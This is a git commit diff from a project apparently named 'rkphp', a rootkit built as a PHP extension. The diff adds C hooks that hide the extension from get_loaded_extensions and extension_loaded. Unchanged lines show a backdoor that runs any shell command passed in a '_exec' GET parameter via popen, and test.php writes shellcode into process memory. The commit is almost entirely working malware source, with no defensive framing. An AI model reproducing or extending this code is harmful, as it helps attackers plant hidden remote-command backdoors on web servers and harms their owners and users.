Browse Source

Default

master
Root 5 years ago
parent
commit
5be9fa5ab6
  1. 2
      rkphp/include/common.h
  2. 66
      rkphp/src/php_funcs.c
  3. 7
      rkphp/test.php

2
rkphp/include/common.h

@ -21,6 +21,8 @@ @@ -21,6 +21,8 @@
#define RKPHP_NAME "rkphp.so" // Make sure to include .so
#define RKPHP_VERSION "0.0.1"
extern ZEND_API HashTable module_registry;
extern zend_module_entry rkphp_module_entry;
#define phpext_rkphp_me_ptr &rkphp_module_entry;

66
rkphp/src/php_funcs.c

@ -37,14 +37,44 @@ int rkphp_hook( @@ -37,14 +37,44 @@ int rkphp_hook(
return 0;
}
void (*o_get_loaded_extensions)(INTERNAL_FUNCTION_PARAMETERS);
void n_get_loaded_extensions(INTERNAL_FUNCTION_PARAMETERS)
static void (*o_get_loaded_extensions)(INTERNAL_FUNCTION_PARAMETERS);
static inline void n_get_loaded_extensions(INTERNAL_FUNCTION_PARAMETERS)
{
php_printf("HELLO, I hooked your bitch of a get_loaded_extensions from php in c!\n");
array_init(return_value);
RETURN_TRUE;
zend_module_entry *module;
ZEND_HASH_FOREACH_PTR(&module_registry, module)
{
if(module->name)
{
if(strcmp(RKPHP_NAME, module->name) == 0)
{
RKPHP_PRINTF("[!] Hidden %s from module_regstry!\n", module->name);
}
else
add_next_index_string(return_value, module->name);
}
} ZEND_HASH_FOREACH_END();
}
static void (*o_extension_loaded)(INTERNAL_FUNCTION_PARAMETERS);
static inline void n_extension_loaded(INTERNAL_FUNCTION_PARAMETERS)
{
zend_module_entry *module;
ZEND_HASH_FOREACH_PTR(&module_registry, module)
{
if(module->name)
{
if(strcmp(RKPHP_NAME, module->name) == 0)
{
RKPHP_PRINTF("[!] Hidden %s from extension_loaded, return false!\n", module->name);
RETURN_FALSE;
}
}
} ZEND_HASH_FOREACH_END();
}
/* {{{ proto void rkphp_ex(int code, int pid)
* Execute root code in memory. */
@ -102,25 +132,13 @@ PHP_MINIT_FUNCTION(rkphp) @@ -102,25 +132,13 @@ PHP_MINIT_FUNCTION(rkphp)
{
RKPHP_PRINTF("PHP_MINIT!\n");
//rkphp_hook("get_loaded_extensions",
// n_get_loaded_extensions,
// &o_get_loaded_extensions);
/*
ulong idx;
#if PHP_VERSION_ID < 70000
char *key;
#else
zend_string *key;
#endif
zval *val;
HashTable *module_registry;
rkphp_hook("get_loaded_extensions",
n_get_loaded_extensions,
&o_get_loaded_extensions);
ZEND_HASH_FOREACH_KEY_VAL(module_registry, idx, key, val)
{
php_printf("HELLO\n");
} ZEND_HASH_FOREACH_END();
*/
rkphp_hook("extension_loaded",
n_extension_loaded,
&o_extension_loaded);
return SUCCESS;
}
@ -149,15 +167,11 @@ PHP_RINIT_FUNCTION(rkphp) @@ -149,15 +167,11 @@ PHP_RINIT_FUNCTION(rkphp)
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
RKPHP_PRINTF("HELLO _GET!\n");
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], *exec, *line;
RKPHP_PRINTF("HELLO _exec!\n");
exec = Z_STRVAL_P(val);
if((fp = popen(exec, "r")) == NULL)
{

7
rkphp/test.php

@ -1,5 +1,10 @@ @@ -1,5 +1,10 @@
<?php
//print_r(get_loaded_extensions());
if(!extension_loaded("rkphp.so"))
printf("[*] Successfully hidden!" . PHP_EOL);
/* Get address range of extension */
function get_ext_range($name)
{
@ -48,4 +53,4 @@ $shc_nop = gen_shc($range, $shc); @@ -48,4 +53,4 @@ $shc_nop = gen_shc($range, $shc);
if(rkphp_ex(getmypid(), $range[0] + $range[1]) == NULL)
die('Failed to execute!' . PHP_EOL);
w_mem($range[0], $shc_nop);
//w_mem($range[0], $shc_nop);

Loading…
Cancel
Save